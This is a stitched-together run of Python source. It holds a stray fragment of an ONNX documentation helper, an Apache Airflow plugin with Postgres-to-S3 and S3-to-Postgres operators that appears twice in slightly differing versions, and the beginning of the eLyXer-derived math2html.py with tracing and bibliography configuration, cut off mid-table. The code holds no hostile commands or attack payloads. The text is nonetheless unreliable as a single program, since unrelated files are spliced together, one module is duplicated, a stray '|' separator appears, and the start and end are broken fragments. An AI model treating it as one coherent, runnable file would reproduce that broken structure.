        if domain == 'ai.onnx.ml':
            return f"https://github.com/onnx/onnx/blob/master/docs/Operators-ml.md#{schema.name}"
        return ''
import csv
from tempfile import NamedTemporaryFile
from airflow.hooks.postgres_hook import PostgresHook
from airflow.hooks.S3_hook import S3Hook
from airflow.models import BaseOperator
from airflow.plugins_manager import AirflowPlugin
from airflow.utils.decorators import apply_defaults
from airflow.operators.postgres_operator import PostgresOperator
from airflow import macros
from contextlib import closing
import json
import uuid
class S3ToPostgresOperator(BaseOperator):
    """
    Insert data into generic Postgres database with copy_from method from psycopg2
    """

    # rendered by Airflow's template engine before execute()
    template_fields = ("source_key", "dest_table")

    @apply_defaults
    def __init__(
        self,
        source_key,
        source_bucket,
        dest_table,
        aws_conn_id="aws_default",
        postgres_conn_id="postgres_default",
        postgres_database=None,
        copy_sep=",",
        copy_null="",
        is_json=False,
        *args,
        **kwargs,
    ):
        """Copy an S3 CSV (or JSON-lines) object into a Postgres table.

        :param source_key: S3 key of the source file (templated).
        :param source_bucket: S3 bucket holding the source file.
        :param dest_table: target table; the file's first row must hold the
            column names (templated).
        :param copy_sep: field delimiter handed to psycopg2 copy_from.
        :param copy_null: textual NULL representation handed to copy_from.
        :param is_json: treat the file as JSON lines (sanitize only, no CSV
            re-writing).
        """
        super().__init__(*args, **kwargs)
        self.source_key = source_key
        self.source_bucket = source_bucket
        self.dest_table = dest_table
        self.aws_conn_id = aws_conn_id
        self.postgres_conn_id = postgres_conn_id
        # NOTE(review): stored but never used in execute() — confirm intent
        self.postgres_database = postgres_database
        self.copy_sep = copy_sep
        self.copy_null = copy_null
        self.is_json = is_json

    def execute(self, context):
        """Download, sanitize, then COPY the file into `dest_table`.

        Returns False (skip) when the file contains at most a header row.
        """
        self.log.info("Getting Connections")
        s3_hook = S3Hook(aws_conn_id=self.aws_conn_id)
        postgres_hook = PostgresHook(postgres_conn_id=self.postgres_conn_id)
        postgres_conn = postgres_hook.get_conn()
        postgres_cursor = postgres_conn.cursor()
        self.log.info("Downloading S3 File")
        with NamedTemporaryFile() as source_csv:
            source_obj = s3_hook.get_key(self.source_key, self.source_bucket)
            # download by temp-file name so the data can be re-opened in text mode
            with open(source_csv.name, "wb") as opened_source_csv:
                source_obj.download_fileobj(opened_source_csv)
                opened_source_csv.flush()
            # a file with only a header line (or nothing) carries no data rows
            with open(source_csv.name, "r") as opened_csv:
                if sum(1 for row in opened_csv) <= 1:
                    self.log.info("CSV returned no row(s). Skipping.")
                    return False
            self.log.info("Replacing special chars")
            # strip backslashes/quotes (and embedded newlines in CSV fields);
            # presumably because copy_from treats backslash as an escape
            # character — TODO confirm
            with open(source_csv.name, "r+") as opened_source_csv, NamedTemporaryFile(
                "w"
            ) as sanitized_csv:
                if self.is_json:
                    for row in opened_source_csv:
                        sanitized_csv.write(row.replace("\\", "").replace("'", ""))
                else:
                    csv_reader = csv.reader(opened_source_csv, delimiter=self.copy_sep)
                    csv_writer = csv.writer(sanitized_csv, delimiter=self.copy_sep)
                    for row in csv_reader:
                        csv_writer.writerow(
                            [
                                x.replace("\\", "").replace("'", "").replace("\n", " ")
                                for x in row
                            ]
                        )
                sanitized_csv.flush()
                self.log.info("Copying File to database")
                with open(sanitized_csv.name, "r") as opened_source_csv:
                    csv_reader = csv.reader(opened_source_csv, delimiter=self.copy_sep)
                    # consume the header line; copy_from then streams the rest
                    column_list = next(csv_reader)
                    self.log.info(f"Got columns: {column_list}")
                    postgres_cursor.copy_from(
                        opened_source_csv,
                        self.dest_table,
                        sep=self.copy_sep,
                        columns=column_list,
                        null=self.copy_null,
                    )
        postgres_conn.commit()
class CreatePrefixTablePostgresOperator(PostgresOperator):
    """Drop and re-create the date-suffixed table
    "<schema>"."<table_prefix>_<nodash-date>" and return its qualified name
    (pushed to XCom by Airflow)."""

    @apply_defaults
    def __init__(
        self,
        schema,
        table_prefix,
        database,
        column_types,
        autocommit=True,
        *args,
        **kwargs,
    ):
        """
        :param column_types: mapping of column name -> SQL type used to build
            the CREATE TABLE column list.
        """
        self._table_prefix = table_prefix
        self._schema = schema
        self.autocommit = autocommit
        self.column_types = column_types
        types = ",\n".join(
            f'\t"{variable}" {type}' for variable, type in column_types.items()
        )
        kwargs.update(
            params=dict(
                schema=schema, database=database, table_prefix=table_prefix, types=types
            ),
            sql="""
            DROP TABLE IF EXISTS "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}";
            CREATE TABLE "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}"(
            {{ params.types }}
            );
            """,
        )
        super().__init__(autocommit=self.autocommit, *args, **kwargs)

    def execute(self, context):
        super().execute(context)
        # BUG FIX: the original wrote context["execution_date"] with double
        # quotes inside a double-quoted f-string — a SyntaxError on every
        # Python before 3.12 (PEP 701); use single quotes.
        return f"{self._schema}.{self._table_prefix}_{macros.date.format_nodash(context['execution_date']).lower()}"
class DropPrefixTablePostgresOperator(PostgresOperator):
    """Drop the date-suffixed table <table_prefix>_<nodash-date> if it exists."""

    @apply_defaults
    def __init__(
        self, schema, table_prefix, database, autocommit=True, *args, **kwargs
    ):
        self.autocommit = autocommit
        # hand the rendered parameters and statement to PostgresOperator
        kwargs["params"] = dict(schema=schema, database=database, table_prefix=table_prefix)
        kwargs["sql"] = """
        DROP TABLE IF EXISTS "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}";
        """
        super().__init__(autocommit=self.autocommit, *args, **kwargs)
class PostgresXcomOperator(BaseOperator):
    """Run a SQL query and push the fetched rows (optionally transformed by
    `python_callable`) to XCom; pushes False when there are no results."""

    template_fields = ("sql",)

    @apply_defaults
    def __init__(
        self, postgres_conn_id, sql, database, python_callable=None, *args, **kwargs
    ):
        super().__init__(*args, **kwargs)
        self.postgres_conn_id = postgres_conn_id
        self.sql = sql
        self.database = database
        self.python_callable = python_callable

    def execute(self, context):
        self.log.info("Going To Start Postgres Xcom Operator")
        cursor = PostgresHook(self.postgres_conn_id).get_conn().cursor()
        self.log.info(f"Going to run:\n{self.sql}")
        cursor.execute(self.sql)
        results = cursor.fetchall()
        if self.python_callable:
            results = self.python_callable(results)
        if not results:
            self.log.info("No Results, pushing false")
            return False
        self.log.info("Got results, pushing xcom")
        return results
class PostgresToS3Operator(BaseOperator):
    """Run a SQL query against Postgres and upload the result to S3 as CSV
    (default) or JSON lines."""

    template_fields = ("sql", "dest_key")
    template_ext = (".sql",)

    @apply_defaults
    def __init__(
        self,
        sql,
        dest_key,
        dest_bucket,
        sql_parameters=None,
        postgres_conn_id="postgres_default",
        aws_conn_id="aws_default",
        persist_header=True,
        is_json=False,
        iter_size=10000,
        *args,
        **kwargs,
    ):
        """
        :param sql: query to run (templated; .sql files are rendered).
        :param dest_key: destination S3 key (templated).
        :param dest_bucket: destination S3 bucket.
        :param sql_parameters: bind parameters passed to cursor.execute.
        :param persist_header: prepend a CSV header row with the column names.
        :param is_json: write each row's first column as one JSON line
            instead of CSV.
        :param iter_size: server-side cursor fetch batch size.
        """
        super().__init__(*args, **kwargs)
        self.postgres_conn_id = postgres_conn_id
        self.aws_conn_id = aws_conn_id
        self.sql = sql
        self.dest_key = dest_key
        self.dest_bucket = dest_bucket
        self.sql_parameters = sql_parameters
        self.persist_header = persist_header
        self.is_json = is_json
        self.iter_size = iter_size

    def execute(self, context):
        """Stream the query result to a temp file, then upload it to S3.

        Returns False (skip) when the query yields no rows, True otherwise.
        """
        self.log.info("Start executing PostgresToS3Operator")
        psql_hook = PostgresHook(postgres_conn_id=self.postgres_conn_id)
        s3_hook = S3Hook(aws_conn_id=self.aws_conn_id)
        with closing(psql_hook.get_conn()) as connection:
            # a named cursor makes psycopg2 use a server-side cursor, so rows
            # arrive in iter_size batches instead of all at once
            with connection, connection.cursor(str(uuid.uuid1())) as cursor:
                cursor.itersize = self.iter_size
                self.log.info(f"Going to execute query {self.sql}")
                cursor.execute(self.sql, self.sql_parameters)
                self.log.info("Writing data")
                i = 0
                with NamedTemporaryFile("w", encoding="utf-8") as temp_file:
                    if self.is_json:
                        for row in cursor:
                            i += 1
                            temp_file.write(json.dumps(row[0]))
                            temp_file.write("\n")
                    else:
                        writer = csv.writer(temp_file, lineterminator="\n")
                        for row in cursor:
                            i += 1
                            writer.writerow(row)
                    temp_file.flush()
                    if i < 1:
                        self.log.info("Got no rows from query. Skipping")
                        return False
                    columns = [description[0] for description in cursor.description]
                    self.log.info(f"Got columns {columns}")
                    # second temp file: optional header row first, then the
                    # already-written data file appended behind it
                    with NamedTemporaryFile("w", encoding="utf-8") as file:
                        if self.persist_header:
                            writer = csv.writer(file, lineterminator="\n")
                            writer.writerow(columns)
                            file.flush()
                        with open(
                            temp_file.name, "r", encoding="utf-8"
                        ) as opened_temp_file:
                            for row in opened_temp_file:
                                file.write(row)
                            file.flush()
                        s3_hook.load_file(
                            filename=file.name,
                            key=self.dest_key,
                            bucket_name=self.dest_bucket,
                            replace=True,
                        )
        return True
class S3ToPostgresPlugin(AirflowPlugin):
    """Registers the Postgres <-> S3 operators above under the
    "postgres_utils" plugin namespace."""

    name = "postgres_utils"
    # operators exported through the plugin manager
    operators = [
        S3ToPostgresOperator,
        CreatePrefixTablePostgresOperator,
        DropPrefixTablePostgresOperator,
        PostgresXcomOperator,
        PostgresToS3Operator,
    ]
    # no custom hooks/executors/macros/admin views are provided
    hooks = []
    executors = []
    macros = []
    admin_views = []
import csv
from tempfile import NamedTemporaryFile
from airflow.hooks.postgres_hook import PostgresHook
from airflow.hooks.S3_hook import S3Hook
from airflow.models import BaseOperator
from airflow.plugins_manager import AirflowPlugin
from airflow.utils.decorators import apply_defaults
from airflow.operators.postgres_operator import PostgresOperator
from airflow import macros
from contextlib import closing
import json
import uuid
class S3ToPostgresOperator(BaseOperator):
    """
    Insert data into generic Postgres database with copy_from method from psycopg2
    """

    # rendered by Airflow's template engine before execute()
    template_fields = ("source_key", "dest_table")

    @apply_defaults
    def __init__(
        self,
        source_key,
        source_bucket,
        dest_table,
        aws_conn_id="aws_default",
        postgres_conn_id="postgres_default",
        postgres_database=None,
        copy_sep=",",
        copy_null="",
        is_json=False,
        *args,
        **kwargs,
    ):
        """Copy an S3 CSV (or JSON-lines) object into a Postgres table.

        The file's first row must hold the target column names.  `copy_sep`
        and `copy_null` are passed through to psycopg2's copy_from.
        """
        super().__init__(*args, **kwargs)
        self.source_key = source_key
        self.source_bucket = source_bucket
        self.dest_table = dest_table
        self.aws_conn_id = aws_conn_id
        self.postgres_conn_id = postgres_conn_id
        # NOTE(review): stored but never used in execute() — confirm intent
        self.postgres_database = postgres_database
        self.copy_sep = copy_sep
        self.copy_null = copy_null
        self.is_json = is_json

    def execute(self, context):
        """Download, sanitize, then COPY the file; returns False (skip) when
        the file holds at most a header row."""
        self.log.info("Getting Connections")
        s3_hook = S3Hook(aws_conn_id=self.aws_conn_id)
        postgres_hook = PostgresHook(postgres_conn_id=self.postgres_conn_id)
        postgres_conn = postgres_hook.get_conn()
        postgres_cursor = postgres_conn.cursor()
        self.log.info("Downloading S3 File")
        with NamedTemporaryFile() as source_csv:
            source_obj = s3_hook.get_key(self.source_key, self.source_bucket)
            with open(source_csv.name, "wb") as opened_source_csv:
                source_obj.download_fileobj(opened_source_csv)
                opened_source_csv.flush()
            # header-only (or empty) file means there is nothing to load
            with open(source_csv.name, "r") as opened_csv:
                if sum(1 for row in opened_csv) <= 1:
                    self.log.info("CSV returned no row(s). Skipping.")
                    return False
            self.log.info("Replacing special chars")
            # strip backslashes/quotes (and embedded newlines in CSV fields)
            # before handing the stream to copy_from
            with open(source_csv.name, "r+") as opened_source_csv, NamedTemporaryFile(
                "w"
            ) as sanitized_csv:
                if self.is_json:
                    for row in opened_source_csv:
                        sanitized_csv.write(row.replace("\\", "").replace("'", ""))
                else:
                    csv_reader = csv.reader(opened_source_csv, delimiter=self.copy_sep)
                    csv_writer = csv.writer(sanitized_csv, delimiter=self.copy_sep)
                    for row in csv_reader:
                        csv_writer.writerow(
                            [
                                x.replace("\\", "").replace("'", "").replace("\n", " ")
                                for x in row
                            ]
                        )
                sanitized_csv.flush()
                self.log.info("Copying File to database")
                with open(sanitized_csv.name, "r") as opened_source_csv:
                    csv_reader = csv.reader(opened_source_csv, delimiter=self.copy_sep)
                    # consume the header; copy_from streams the remaining rows
                    column_list = next(csv_reader)
                    self.log.info(f"Got columns: {column_list}")
                    postgres_cursor.copy_from(
                        opened_source_csv,
                        self.dest_table,
                        sep=self.copy_sep,
                        columns=column_list,
                        null=self.copy_null,
                    )
        postgres_conn.commit()
class CreatePrefixTablePostgresOperator(PostgresOperator):
    """Drop and re-create the date-suffixed table
    "<schema>"."<table_prefix>_<nodash-date>", returning its qualified name
    (pushed to XCom by Airflow)."""

    @apply_defaults
    def __init__(
        self,
        schema,
        table_prefix,
        database,
        column_types,
        autocommit=True,
        *args,
        **kwargs,
    ):
        # column_types: mapping of column name -> SQL type for CREATE TABLE
        self._table_prefix = table_prefix
        self._schema = schema
        self.autocommit = autocommit
        self.column_types = column_types
        # render the quoted column list once, up front
        types = ",\n".join(
            f'\t"{variable}" {type}' for variable, type in column_types.items()
        )
        kwargs.update(
            params=dict(
                schema=schema, database=database, table_prefix=table_prefix, types=types
            ),
            sql="""
            DROP TABLE IF EXISTS "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}";
            CREATE TABLE "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}"(
            {{ params.types }}
            );
            """,
        )
        super().__init__(autocommit=self.autocommit, *args, **kwargs)

    def execute(self, context):
        # run the DROP/CREATE, then return the fully qualified table name
        super().execute(context)
        return f"{ self._schema }.{ self._table_prefix }_{ macros.date.format_nodash(context['execution_date']).lower() }"
class DropPrefixTablePostgresOperator(PostgresOperator):
    """Drop the date-suffixed table <table_prefix>_<nodash-date> if it exists."""

    @apply_defaults
    def __init__(
        self, schema, table_prefix, database, autocommit=True, *args, **kwargs
    ):
        self.autocommit = autocommit
        # hand the rendered parameters and statement to PostgresOperator
        kwargs.update(
            params=dict(schema=schema, database=database, table_prefix=table_prefix),
            sql="""
            DROP TABLE IF EXISTS "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}";
            """,
        )
        super().__init__(autocommit=self.autocommit, *args, **kwargs)
class PostgresXcomOperator(BaseOperator):
    """Run a SQL query and push its fetched rows (optionally transformed by
    `python_callable`) to XCom; pushes False when there are no results."""

    template_fields = ("sql",)

    @apply_defaults
    def __init__(
        self, postgres_conn_id, sql, database, python_callable=None, *args, **kwargs
    ):
        super().__init__(*args, **kwargs)
        self.postgres_conn_id = postgres_conn_id
        self.sql = sql
        self.database = database
        self.python_callable = python_callable

    def execute(self, context):
        self.log.info("Going To Start Postgres Xcom Operator")
        postgres_hook = PostgresHook(self.postgres_conn_id)
        conn = postgres_hook.get_conn()
        cursor = conn.cursor()
        self.log.info(f"Going to run:\n{self.sql}")
        cursor.execute(self.sql)
        results = cursor.fetchall()
        # optional post-processing hook before the XCom push
        if self.python_callable:
            results = self.python_callable(results)
        if results:
            self.log.info("Got results, pushing xcom")
            return results
        else:
            self.log.info("No Results, pushing false")
            return False
class PostgresToS3Operator(BaseOperator):
    """Run a SQL query against Postgres and upload the result to S3 as CSV
    (default) or JSON lines."""

    template_fields = ("sql", "dest_key")
    template_ext = (".sql",)

    @apply_defaults
    def __init__(
        self,
        sql,
        dest_key,
        dest_bucket,
        sql_parameters=None,
        postgres_conn_id="postgres_default",
        aws_conn_id="aws_default",
        persist_header=True,
        is_json=False,
        iter_size=10000,
        *args,
        **kwargs,
    ):
        # persist_header: prepend a CSV header row with the column names
        # is_json: write each row's first column as one JSON line
        # iter_size: server-side cursor fetch batch size
        super().__init__(*args, **kwargs)
        self.postgres_conn_id = postgres_conn_id
        self.aws_conn_id = aws_conn_id
        self.sql = sql
        self.dest_key = dest_key
        self.dest_bucket = dest_bucket
        self.sql_parameters = sql_parameters
        self.persist_header = persist_header
        self.is_json = is_json
        self.iter_size = iter_size

    def execute(self, context):
        """Stream the query result to a temp file and upload it; returns
        False (skip) when the query yields no rows, True otherwise."""
        self.log.info("Start executing PostgresToS3Operator")
        psql_hook = PostgresHook(postgres_conn_id=self.postgres_conn_id)
        s3_hook = S3Hook(aws_conn_id=self.aws_conn_id)
        with closing(psql_hook.get_conn()) as connection:
            # named cursor -> psycopg2 server-side cursor, batched fetches
            with connection, connection.cursor(str(uuid.uuid1())) as cursor:
                cursor.itersize = self.iter_size
                self.log.info(f"Going to execute query {self.sql}")
                cursor.execute(self.sql, self.sql_parameters)
                self.log.info("Writing data")
                i = 0
                with NamedTemporaryFile("w", encoding="utf-8") as temp_file:
                    if self.is_json:
                        for row in cursor:
                            i += 1
                            temp_file.write(json.dumps(row[0]))
                            temp_file.write("\n")
                    else:
                        writer = csv.writer(temp_file, lineterminator="\n")
                        for row in cursor:
                            i += 1
                            writer.writerow(row)
                    temp_file.flush()
                    if i < 1:
                        self.log.info("Got no rows from query. Skipping")
                        return False
                    columns = [description[0] for description in cursor.description]
                    self.log.info(f"Got columns {columns}")
                    # second temp file: optional header row, then data appended
                    with NamedTemporaryFile("w", encoding="utf-8") as file:
                        if self.persist_header:
                            writer = csv.writer(file, lineterminator="\n")
                            writer.writerow(columns)
                            file.flush()
                        with open(
                            temp_file.name, "r", encoding="utf-8"
                        ) as opened_temp_file:
                            for row in opened_temp_file:
                                file.write(row)
                            file.flush()
                        s3_hook.load_file(
                            filename=file.name,
                            key=self.dest_key,
                            bucket_name=self.dest_bucket,
                            replace=True,
                        )
        return True
class S3ToPostgresPlugin(AirflowPlugin):
    """Registers the Postgres <-> S3 operators above under the
    "postgres_utils" plugin namespace."""

    name = "postgres_utils"
    # operators exported through the plugin manager
    operators = [
        S3ToPostgresOperator,
        CreatePrefixTablePostgresOperator,
        DropPrefixTablePostgresOperator,
        PostgresXcomOperator,
        PostgresToS3Operator,
    ]
    # no custom hooks/executors/macros/admin views are provided
    hooks = []
    executors = []
    macros = []
    admin_views = []
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# math2html: convert LaTeX equations to HTML output.
#
# Copyright (C) 2009-2011 Alex Fernández
#
# Released under the terms of the `2-Clause BSD license'_, in short:
# Copying and distribution of this file, with or without modification,
# are permitted in any medium without royalty provided the copyright
# notice and this notice are preserved.
# This file is offered as-is, without any warranty.
#
# .. _2-Clause BSD license: http://www.spdx.org/licenses/BSD-2-Clause
# Based on eLyXer: convert LyX source files to HTML output.
# http://alexfernandez.github.io/elyxer/
# --end--
# Alex 20101110
# eLyXer standalone formula conversion to HTML.
import codecs
import datetime
import gettext
import io
import os.path
import sys
import unicodedata
# Python 2/3 compatibility shims.  On Python 3, also alias the Python-2
# built-in names (unicode, basestring, file) that the rest of this module
# still references.
if sys.version_info >= (3, 0):
    from urllib.parse import quote_plus  # noqa
    unicode = str  # noqa
    basestring = str  # noqa
    file = io.IOBase  # noqa
else:
    from urllib import quote_plus  # noqa
class Trace(object):
    """A simple class-level tracing helper.

    All state and methods live on the class itself: callers use
    ``Trace.debug(...)``, ``Trace.error(...)`` etc. without instantiating.
    Informational output goes to stdout, errors to stderr.
    """

    # Emit debug() messages only when True.
    debugmode = False
    # Suppress all non-error output (including debug output) when True.
    quietmode = False
    # Prepend `prefix` to messages when True and prefix is set.
    showlinesmode = False
    # Optional string prepended to messages in showlinesmode.
    prefix = None

    @classmethod
    def debug(cls, message):
        "Show a debug message"
        if not Trace.debugmode or Trace.quietmode:
            return
        Trace.show(message, sys.stdout)

    @classmethod
    def message(cls, message):
        "Show a trace message"
        if Trace.quietmode:
            return
        if Trace.prefix and Trace.showlinesmode:
            message = Trace.prefix + message
        Trace.show(message, sys.stdout)

    @classmethod
    def error(cls, message):
        "Show an error message"
        message = '* ' + message
        if Trace.prefix and Trace.showlinesmode:
            message = Trace.prefix + message
        Trace.show(message, sys.stderr)

    @classmethod
    def fatal(cls, message):
        "Show an error message and terminate"
        Trace.error('FATAL: ' + message)
        # sys.exit instead of the site-provided exit(): exit() is only
        # guaranteed to exist when the site module is loaded.
        sys.exit(-1)

    @classmethod
    def show(cls, message, channel):
        "Show a message out of a channel"
        if sys.version_info < (3, 0):
            message = message.encode('utf-8')
        channel.write(message + '\n')
class BibStylesConfig(object):
    "Configuration class from elyxer.config file"

    # Bibliography formatting templates, one dict per BibTeX style.  Keys are
    # entry types ('@article', ...); 'cite' is the inline citation format and
    # 'default' the fallback for unlisted entry types.  '$name' placeholders
    # are filled from BibTeX fields; a '{...}' group is dropped when a field
    # inside it is missing.
    abbrvnat = {
        u'@article': u'$authors. $title. <i>$journal</i>,{ {$volume:}$pages,} $month $year.{ doi: $doi.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$surname($year)',
        u'default': u'$authors. <i>$title</i>. $publisher, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    alpha = {
        u'@article': u'$authors. $title.{ <i>$journal</i>{, {$volume}{($number)}}{: $pages}{, $year}.}{ <a href="$url">$url</a>.}{ <a href="$filename">$filename</a>.}{ $note.}',
        u'cite': u'$Sur$YY',
        u'default': u'$authors. $title.{ <i>$journal</i>,} $year.{ <a href="$url">$url</a>.}{ <a href="$filename">$filename</a>.}{ $note.}',
    }
    authordate2 = {
        u'@article': u'$authors. $year. $title. <i>$journal</i>, <b>$volume</b>($number), $pages.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'$authors. $year. <i>$title</i>. $publisher.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$surname, $year',
        u'default': u'$authors. $year. <i>$title</i>. $publisher.{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    # Fallback style used when no BibTeX style is specified.
    default = {
        u'@article': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'{$authors: }<i>$title</i>{ ($editor, ed.)}.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@booklet': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@conference': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@inbook': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@incollection': u'$authors: <i>$title</i>{ in <i>$booktitle</i>{ ($editor, ed.)}}.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@inproceedings': u'$authors: “$title”, <i>$booktitle</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@manual': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@mastersthesis': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@misc': u'$authors: <i>$title</i>.{{ $publisher,}{ $howpublished,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@phdthesis': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@proceedings': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@techreport': u'$authors: <i>$title</i>, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@unpublished': u'$authors: “$title”, <i>$journal</i>, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$index',
        u'default': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    # Default values substituted when a tag is absent from the entry.
    defaulttags = {
        u'YY': u'??', u'authors': u'', u'surname': u'',
    }
    ieeetr = {
        u'@article': u'$authors, “$title”, <i>$journal</i>, vol. $volume, no. $number, pp. $pages, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'$authors, <i>$title</i>. $publisher, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$index',
        u'default': u'$authors, “$title”. $year.{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    plain = {
        u'@article': u'$authors. $title.{ <i>$journal</i>{, {$volume}{($number)}}{:$pages}{, $year}.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'$authors. <i>$title</i>. $publisher,{ $month} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@incollection': u'$authors. $title.{ In <i>$booktitle</i> {($editor, ed.)}.} $publisher,{ $month} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
        u'@inproceedings': u'$authors. $title. { <i>$booktitle</i>{, {$volume}{($number)}}{:$pages}{, $year}.}{ URL <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$index',
        u'default': u'{$authors. }$title.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
    }
    vancouver = {
        u'@article': u'$authors. $title. <i>$journal</i>, $year{;{<b>$volume</b>}{($number)}{:$pages}}.{ URL: <a href="$url">$url</a>.}{ $note.}',
        u'@book': u'$authors. $title. {$publisher, }$year.{ URL: <a href="$url">$url</a>.}{ $note.}',
        u'cite': u'$index',
        u'default': u'$authors. $title; {$publisher, }$year.{ $howpublished.}{ URL: <a href="$url">$url</a>.}{ $note.}',
    }
class BibTeXConfig(object):
    "Configuration class from elyxer.config file"

    # Literal substitutions applied to BibTeX text: a TeX-style double dash
    # becomes an em dash, and a doubled period collapses to one.
    replaced = {
        u'--': u'—', u'..': u'.',
    }
class ContainerConfig(object):
    "Configuration class from elyxer.config file"

    # Maps a container (parser) class name to the LyX token that terminates it.
    endings = {
        u'Align': u'\\end_layout', u'BarredText': u'\\bar',
        u'BoldText': u'\\series', u'Cell': u'</cell',
        u'ChangeDeleted': u'\\change_unchanged',
        u'ChangeInserted': u'\\change_unchanged', u'ColorText': u'\\color',
        u'EmphaticText': u'\\emph', u'Hfill': u'\\hfill', u'Inset': u'\\end_inset',
        u'Layout': u'\\end_layout', u'LyXFooter': u'\\end_document',
        u'LyXHeader': u'\\end_header', u'Row': u'</row', u'ShapedText': u'\\shape',
        u'SizeText': u'\\size', u'StrikeOut': u'\\strikeout',
        u'TextFamily': u'\\family', u'VersalitasText': u'\\noun',
    }
    # Rules for plain-text extraction: which container classes are kept as-is,
    # cloned, or have their text extracted recursively.
    extracttext = {
        u'allowed': [u'StringContainer', u'Constant', u'FormulaConstant',],
        u'cloned': [u'',],
        u'extracted': [u'PlainLayout', u'TaggedText', u'Align', u'Caption', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula', u'Bracket', u'RawText', u'BibTag', u'FormulaNumber', u'AlphaCommand', u'EmptyCommand', u'OneParamFunction', u'SymbolFunction', u'TextFunction', u'FontFunction', u'CombiningFunction', u'DecoratingFunction', u'FormulaSymbol', u'BracketCommand', u'TeXCode',],
    }
    # Opening tokens paired with their matching closing tokens.
    startendings = {
        u'\\begin_deeper': u'\\end_deeper', u'\\begin_inset': u'\\end_inset',
        u'\\begin_layout': u'\\end_layout',
    }
    # Dispatch table: the LyX token that opens a line is mapped to the name of
    # the container class that parses it ('BlackBox' swallows the line).
    starts = {
        u'': u'StringContainer', u'#LyX': u'BlackBox', u'</lyxtabular': u'BlackBox',
        u'<cell': u'Cell', u'<column': u'Column', u'<row': u'Row',
        u'\\align': u'Align', u'\\bar': u'BarredText',
        u'\\bar default': u'BlackBox', u'\\bar no': u'BlackBox',
        u'\\begin_body': u'BlackBox', u'\\begin_deeper': u'DeeperList',
        u'\\begin_document': u'BlackBox', u'\\begin_header': u'LyXHeader',
        u'\\begin_inset Argument': u'ShortTitle',
        u'\\begin_inset Box': u'BoxInset', u'\\begin_inset Branch': u'Branch',
        u'\\begin_inset Caption': u'Caption',
        u'\\begin_inset CommandInset bibitem': u'BiblioEntry',
        u'\\begin_inset CommandInset bibtex': u'BibTeX',
        u'\\begin_inset CommandInset citation': u'BiblioCitation',
        u'\\begin_inset CommandInset href': u'URL',
        u'\\begin_inset CommandInset include': u'IncludeInset',
        u'\\begin_inset CommandInset index_print': u'PrintIndex',
        u'\\begin_inset CommandInset label': u'Label',
        u'\\begin_inset CommandInset line': u'LineInset',
        u'\\begin_inset CommandInset nomencl_print': u'PrintNomenclature',
        u'\\begin_inset CommandInset nomenclature': u'NomenclatureEntry',
        u'\\begin_inset CommandInset ref': u'Reference',
        u'\\begin_inset CommandInset toc': u'TableOfContents',
        u'\\begin_inset ERT': u'ERT', u'\\begin_inset Flex': u'FlexInset',
        u'\\begin_inset Flex Chunkref': u'NewfangledChunkRef',
        u'\\begin_inset Flex Marginnote': u'SideNote',
        u'\\begin_inset Flex Sidenote': u'SideNote',
        u'\\begin_inset Flex URL': u'FlexURL', u'\\begin_inset Float': u'Float',
        u'\\begin_inset FloatList': u'ListOf', u'\\begin_inset Foot': u'Footnote',
        u'\\begin_inset Formula': u'Formula',
        u'\\begin_inset FormulaMacro': u'FormulaMacro',
        u'\\begin_inset Graphics': u'Image',
        u'\\begin_inset Index': u'IndexReference',
        u'\\begin_inset Info': u'InfoInset',
        u'\\begin_inset LatexCommand bibitem': u'BiblioEntry',
        u'\\begin_inset LatexCommand bibtex': u'BibTeX',
        u'\\begin_inset LatexCommand cite': u'BiblioCitation',
        u'\\begin_inset LatexCommand citealt': u'BiblioCitation',
        u'\\begin_inset LatexCommand citep': u'BiblioCitation',
